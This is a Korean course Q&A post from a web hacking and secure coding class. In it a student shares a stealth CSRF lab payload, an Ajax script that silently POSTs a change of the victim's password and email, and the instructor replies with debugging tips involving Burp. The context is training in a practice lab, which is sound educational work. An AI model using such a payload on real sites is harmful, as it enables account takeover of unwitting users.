인프런 커뮤니티 질문&답변

yeonbeom sung

작성한 질문수

웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩

[실습6-3] Ajax를 활용한 Stealth CSRF 공격

코드상에 잘못된 점을 모르겠습니다 ㅠ

작성

183

<script> var xhp = new XMLHttpRequest(); xhp.open("POST", "/index.php?page=mypage", true); xhp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhp.send("gubun=action&name=희생자&password=test&email=victim&company=(주)희생자"); </script>

인데 안되는 이유를 모르겠습니다. 입력할때는 개행 다 없앴습니다.

인젝션 모의해킹

퀴즈

CSRF(Cross-Site Request Forgery) 공격의 가장 핵심적인 특징은 무엇일까요?

사용자의 개인 정보를 직접 탈취합니다.

로그인된 사용자가 의도하지 않은 행위를 수행하도록 강제합니다.

웹 서버의 데이터베이스에 직접적인 코드를 주입합니다.

웹사이트의 정상적인 트래픽을 마비시킵니다.

답변 1

크리핵티브

지식공유자

안녕하세요.

코드상 문제는 없는 것 같습니다.

저처럼 사이트 접속 시 /insecure_website/ 하위에 소스코드가 있으신건 아니죠?

희생자 웹 브라우저에서 해당 스크립트 실행 시 버프를 통해 잘 요청되는지, 응답은 제대로 오는지도 확인을 해보시면 문제점 파악이 가능하실겁니다.

yeonbeom sung

작성한 질문수

전체 Q&A

질문하기